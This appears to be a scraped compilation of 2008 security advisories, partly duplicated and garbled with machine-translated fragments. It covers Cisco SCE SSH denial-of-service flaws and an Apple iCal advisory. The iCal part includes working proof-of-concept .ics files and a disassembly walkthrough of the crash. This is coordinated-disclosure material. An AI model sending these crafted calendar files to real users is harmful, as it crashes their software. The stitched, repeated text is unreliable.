vulnerabilities may result in the loss of management access or, in some cases, cause vulnerable SCE devices to reload. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release for each vulnerability: +---------------------------------------+ | | Affected | First | | Vulnerability | Major | Fixed | | | Release | Release | |------------------+----------+---------| | System | 1.x | 3.1.6 | |vulnerability to |----------+---------| | SSH login | 2.x | 3.1.6 | |activity |----------+---------| | | 3.x | 3.1.6 | |------------------+----------+---------| | | 1.x | 3.0.7 | |SSH login |----------+---------| | activity leads | 2.x | 3.0.7 | |to illegal IO |----------+---------| | operations | 3.x | 3.0.7, | | | | 3.1.0 | |------------------+----------+---------| | | 1.x | 3.1.6 | |SCE SSH |----------+---------| | authentication | 2.x | 3.1.6 | |sequence anomaly |----------+---------| | | 3.x | 3.1.6 | +---------------------------------------+ SCOS software version 3.1.6 contains the fixes for all vulnerabilities described in this document. SCOS software is available for download from the following location on cisco.com: http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Restricting SCE SSH management interface access to only trusted devices through the use of SCE ACLs or Transit ACLs is strongly recommended. Additional information about SCE ACLs is available in the "Configuring the Management Interface and Security" section of the SCE Software Configuration Guide: http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396 Additional information about tACLs is available in Transit Access Control Lists: Filtering at Your Edge: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. The SSH login activity vulnerability was discovered during the resolution of customer support cases. The illegal Input/Output operation and authentication sequence anomaly were discovered by Cisco during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-21 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 21, 2008 Document ID: 100706 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC iNU22mLg2pFDqnDyLstihPI= =oKHO -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . flooding the vulnerable system with a large amount of packets

Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) 3.0.x before 3.0.7 and 3.1.x before 3.1.0, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (management interface outage) via SSH traffic that occurs during management operations and triggers "illegal I/O operations," aka Bug ID CSCsh49563. The Icon Labs Iconfidant SSH server contails multiple vulnerabilities. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. The problem is Bug IDs CSCsh49563 It is a problem.Management operations and fraud by third parties I/O Caused by operation SSH Service disruption through traffic (DoS) There is a possibility of being put into a state. Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users. SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Successful exploitation of these vulnerabilities requires that the SSH server is enabled (not enabled by default). SOLUTION: Update to version 3.1.6. http://www.cisco.com/pcgi-bin/tablebuild.pl/scos PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The first vulnerability may be triggered during SSH login activity that is conducted within aggressive time frames. The second vulnerability may be triggered with normal SSH login activity in combination with other SCE management actions occurring simultaneously. The third vulnerability may be triggered during SSH login and is specific to the usage of unique invalid authentication credentials. Cisco has made free upgrade software available to address these vulnerabilities for affected customers. There are no workarounds for these vulnerabilities. Note: These vulnerabilities are independent of each other; a device may be affected by one vulnerability and not by the others. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml. Note: The SCE SSH server is disabled by default. The following example shows a Cisco SCE that runs software release 3.1.6: SCE2000#>show version System version: Version 3.1.6 Build 157 Build time: Mar 31 2008, 18:58:49 (Change-list 303626) Software version is: Version 3.1.6 Build 157 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco SCE 1000 and 2000 series devices provide high-capacity advanced application-level bandwidth optimization, stateful application inspection, session-based classification and control of network traffic. The SCE solution allows for the detection and control of network applications including: web browsing, multimedia streaming, and peer-to-peer (P2P). This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities are independent of each other. Specific SSH processes may encounter temporary resource unavailability if called within aggressive intervals. This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534. During this event, an illegal IO operation may impact the SCE management agent, requiring a reboot of the SCE to recover management access. This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been assigned CVE ID CVE-2008-0536. * SCE SSH authentication sequence anomaly A third vulnerability exists in the SCE SSH server that may also be triggered during the SSH login process but unrelated to login attempt frequency or other concurrent management tasks. This issue is triggered by the usage of specific SSH credentials that attempt to change the authentication method, resulting in an authentication sequence anomaly impacting system stability. This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been assigned CVE ID CVE-2008-0535. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * System vulnerability to SSH login activity (CSCsi68582) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SSH login activity leads to illegal I/O operations (CSCsh49563) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SCE SSH authentication sequence anomaly (CSCsm14239) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities may result in the loss of management access or, in some cases, cause vulnerable SCE devices to reload. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release for each vulnerability: +---------------------------------------+ | | Affected | First | | Vulnerability | Major | Fixed | | | Release | Release | |------------------+----------+---------| | System | 1.x | 3.1.6 | |vulnerability to |----------+---------| | SSH login | 2.x | 3.1.6 | |activity |----------+---------| | | 3.x | 3.1.6 | |------------------+----------+---------| | | 1.x | 3.0.7 | |SSH login |----------+---------| | activity leads | 2.x | 3.0.7 | |to illegal IO |----------+---------| | operations | 3.x | 3.0.7, | | | | 3.1.0 | |------------------+----------+---------| | | 1.x | 3.1.6 | |SCE SSH |----------+---------| | authentication | 2.x | 3.1.6 | |sequence anomaly |----------+---------| | | 3.x | 3.1.6 | +---------------------------------------+ SCOS software version 3.1.6 contains the fixes for all vulnerabilities described in this document. SCOS software is available for download from the following location on cisco.com: http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Restricting SCE SSH management interface access to only trusted devices through the use of SCE ACLs or Transit ACLs is strongly recommended. Additional information about SCE ACLs is available in the "Configuring the Management Interface and Security" section of the SCE Software Configuration Guide: http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396 Additional information about tACLs is available in Transit Access Control Lists: Filtering at Your Edge: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. The SSH login activity vulnerability was discovered during the resolution of customer support cases. The illegal Input/Output operation and authentication sequence anomaly were discovered by Cisco during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-21 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 21, 2008 Document ID: 100706 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC iNU22mLg2pFDqnDyLstihPI= =oKHO -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . flooding the vulnerable system with a large amount of packets

Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a .ics file containing (1) a large 16-bit integer on a TRIGGER line, or (2) a large integer in a COUNT field on an RRULE line. (1) TRIGGER Excessively large of lines 16 Bit integer (2) RRULE In line COUNT Overly large integer in field. Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Multiple vulnerabilities in iCal *Advisory Information* Title: Multiple vulnerabilities in iCal Advisory ID: CORE-2008-0126 Advisory URL: http://www.coresecurity.com/?action=item&id=2219 Date published: 2008-05-21 Date of last update: 2008-05-21 Vendors contacted: Apple Inc. Release mode: Coordinated release *Vulnerability Information* Class: Input Validation Remotely Exploitable: Yes (client-side) Locally Exploitable: No Bugtraq ID: 28629 28632 28633 CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007 *Vulnerability Description* iCal is a personal calendar application from Apple Inc. included on the Mac OS X operating system. The calendar application can be used as a stand-alone application or as a client-side component to calendar server that lets users create and share multiple calendars and subscribe to other user's calendars. Apple's iCal uses the iCalendar standard for its calendar file format (which uses the '.ics' filename extension) [1] and the CalDAV protocol for calendar sharing [2]. There is a growing number of web sites providing calendars files and open subscription to calendar updates [3][4][5]. The most serious of the three vulnerabilities is due to potential memory corruption resulting from a resource liberation bug that can be triggered with a malformed '.ics' calendar file specially crafted by a would-be attacker. Exploitation of these vulnerabilities in a client-side attack scenario is possible with user assistance by opening or clicking on specially crafted '.ics' file send over email or hosted on a malicious web server; or without direct user assistance if a would-be attacker has the ability to legitimately add or modify calendar files on a CalDAV server. *Vulnerable Packages* . iCal version 3.0.1 on MacOS X 10.5.1 (Leopard). *Non-vulnerable Packages* . Available through Apple security updates (see vendor information below). *Vendor Information, Solutions and Workarounds* The following information was provided by the vendor: Availability Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338 Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/ Cross-References If you provide cross-referencing information in your advisory please link to the following URL: http://support.apple.com/kb/HT1222 *Credits* These vulnerabilities were discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (SCS) team of Core Security Technologies during Bugweek 2007. Additional research was done by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT). A client-side attack directed to the end-users of the iCal application can be executed by sending an email with a malicious .ics file attachment, by hosting a malicious .ics file on web site and directing users to open it or by injecting a malicous .ics file on a CalDAV enabled server to which potential victims are subscribed to update their calendars automatically. In the three reported cases the vulnerabilities arise from improper validation of input while or after parsing of the calendar file format. The following Proof of Concept (PoC) file is provided to demonstrate its feasibility, to trigger the bug import a .ics file with the following content and then select one of the created events. /----------- BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME: Vulnerable VERSION:2.0 X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:4 DTSTART;TZID=America/Buenos_Aires:20071225T110000 DURATION:PT1H UID:48878014-5F03-43E5-8639-61E708714F9A DTSTAMP:20071213T130632Z SUMMARY:Vuln CREATED:20071213T130611Z RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 END:VEVENT END:VCALENDAR - -----------/ Analysis of the vulnerability The above proof-of-concept file creates new events in the iCal application . When a user double-clicks on these events the program crashes writing in the memory pointed by pointer 'EDI=0'. Only the value of 'EAX' is under control, must be less than '0x7fffffff' and is extracted from the following line of the PoC '.ics' file. /----------- RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE) - -----------/ /----------- __text:0013C178 push ebp __text:0013C179 mov ebp, esp __text:0013C17B sub esp, 38h __text:0013C17E mov eax, ds:off_1F435C __text:0013C183 mov [ebp+var_4], edi __text:0013C186 mov edi, [ebp+arg_C] __text:0013C189 mov [ebp+var_8], esi __text:0013C18C mov esi, [ebp+arg_8] __text:0013C18F mov [ebp+var_C], ebx __text:0013C192 mov [esp+38h+var_34], eax __text:0013C196 mov eax, [ebp+arg_0] __text:0013C199 mov [esp+38h+var_28], 0 __text:0013C1A1 mov [esp+38h+var_2C], 0 - -----------/ Here is written on '[ebp + var28]' and '[ebp + var2C]' and because 'EBP' is 'ESP' minus '0x38', this is similar to /----------- [ebp + var28] = [esp+0x38+var_28] [ebp + var2C] = [esp+0x38+var_2C] - -----------/ There are located the null-pointers on the stack. /----------- BFFFEF7C var_2C dd 0 BFFFEF80 var_28 dd 0 - -----------/ Upon reaching the function where the crash occurs. /----------- __text:0014ADC3 push ebp __text:0014ADC4 mov ebp, esp __text:0014ADC6 sub esp, 48h __text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass - -----------/ Logically the zeros are still present because don't work with those values until we enter. /----------- BFFFEF7C arg_C dd 0 BFFFEF80 arg_10 dd 0 - -----------/ We see that the function argument 'arg_C' is loaded and moved to 'EDI'. /----------- 0014ADE0 mov edi, [ebp+arg_C] - -----------/ And this is the location where is written at the moment of crashing further ahead, meaning that it is a zero that can't be changed. /----------- 0014AE2F mov dword ptr [edi], 0 - -----------/ When getting closer to the point of crash because we control 'EAX' and we can trigger a jump after comparing with '[ebx+0Ch]' and '[ebx+08h]'. /----------- 0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1) 0014AE23 jl short loc_14AE2F 0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F) 0014AE2D jle short loc_14AE37 169280B8 dd 270Fh (ebx+08) 169280BC dd 1 (ebx+0C) - -----------/ The first comparison for 'JL' doesn't avoid the crash zone, but anyway negative numbers can't be inserted by default and a zero value does not crash the program or even gets it near the critical zone. Any other value crashes the application when writing in the null location. In the other case a comparison is made such that if 'EAX' is less than '0x270f' the crash zone is avoided and the program continues to work without problem. Negative values are not read and if a value greater than '0x7fffffff' the maximum value is used instead. The corresponding PoC follows. to trigger the bug import a .ics file with the following content then click on the 65535 on edit mode and accept it without changes. /----------- BEGIN:VCALENDAR X-WR-CALNAME:Fake event PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN VERSION:2.0 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:10 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T124414Z SUMMARY:Fake Event DTEND;TZID=America/Buenos_Aires:20071225T010000 RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 TRANSP:OPAQUE CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT65535H END:VALARM END:VEVENT END:VCALENDAR - -----------/ 3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007) This is another case of bad validation of a file with the iCalendar format that results in a more serious bug. A vulnerable .ics file will contain the following line: /----------- ATTACH;VALUE=URI:S=osumi - -----------/ The corresponding PoC follows. Double-click on the .ics file with the following content, an event will be created. To crash iCal click on the newly created event and the on the alarm sound list. /----------- BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME:evento falso VERSION:2.0 X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:11 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T143420Z SUMMARY:evento falso DTEND;TZID=America/Buenos_Aires:20071225T010000 LOCATION:donde se hace RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 TRANSP:OPAQUE UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 URL;VALUE=URI:http://pepe.com:443/pepe ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2 0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php CREATED:20071213T142720Z CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT15H END:VALARM BEGIN:VALARM X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0 ACTION:AUDIO TRIGGER:-PT15M ATTACH;VALUE=URI:S=osumi END:VALARM END:VEVENT END:VCALENDAR - -----------/ *Report Timeline* . 2008-01-30: Core sends an initial notification that vulnerabilities were discovered in the iCal application and iCal server and that an advisory draft is available. 2008-01-31: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft, including proof-of-concept files that trigger the bugs. 2008-02-12: Core requests update info on the vulnerabilities and states that wants to coordinate the date of the disclosure. 2008-02-18: Core requests update info on the vulnerabilities. 2008-02-18: Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is tracked for a fix in an upcoming update and the vulnerabilities in the iCal client application will be fixed in an update following the early March software update. 2008-02-19: Core indicated that it will split the report in two security advisories. CORE-2008-0123 will address the vulnerability in iCal server (CVE-2008-1000) and will be published in coordination with the release of the vendor's March software update. The publication date for the second advisory, will dealt bydealing with the three vulnerabilities in the iCal client application will be coordinated for a date after the March update unless there are clear indications of the vulnerability being exploited in the wild, in which case if Core considers that the information provided in the advisory would help end users to decide how to react the advisory would be published sooner as a "forced release". 2008-03-03: Core requests update info on the vulnerability, a concrete release schedule and text for the advisory section called "Vendor Information, Solutions and Workarounds". 2008-03-04: Vendor provides information concerning CVE-2008-1000 and indicates that the bug is in the Wiki server and not the iCal Server. 2008-03-13: Core re-schedules the publication to March 24th and requests the vendor an update on the coordinated date of disclosure. The remaining three vulnerabilities in the iCal client application will be dealt by a second security advisory (CORE-2008-0126) to be published after the release of the March software update. Publication of CORE-2008-0126 is initially slated for March 24th 2008 but the final date estimation can be discussed further with the vendor based on its estimated date for fixes. 2008-03-18: APPLE-SA-2008-0318 software update released. 2008-03-18: CORE-2008-0123 is published. 2008-03-18: Vendor informs that will track the first two issues as crasher-only bugs but still intends to address them. Further details to determine if the null pointer de-reference bugs are exploitable are requested. The vendor will continue to track the third as a security bug and estimates early April for the release of the software update that fix them. Additional timing information will be provided closer to the estimated date. 2008-03-18: Core re-schedules the publication to April 7th and indicates that should any new details about the vulnerabilities become available they will be forwarded to the vendor. 2008-04-04: Core requests a more precise date of release of the fixes to coordinate the publication and recommends the vendor to consider the three as security bugs because it couldn't be proved that in this case the integer overflows can't be exploited. 2008-04-07: Vendor requests that Core to postpone the advisory publication until the fix is available. 2008-04-07: Core requests a more precise date of release of the fixes to coordinate the new publication date. 2008-04-07: Vendor informs that the estimated date for the update is near the end of April. 2008-04-08: Core confirms that coordinating the publication of CORE-2008-0126 for April 28th is acceptable. 2008-04-16: Core requests an update on the release date of the fixes. 2008-04-17: Vendor states that end of April is still the 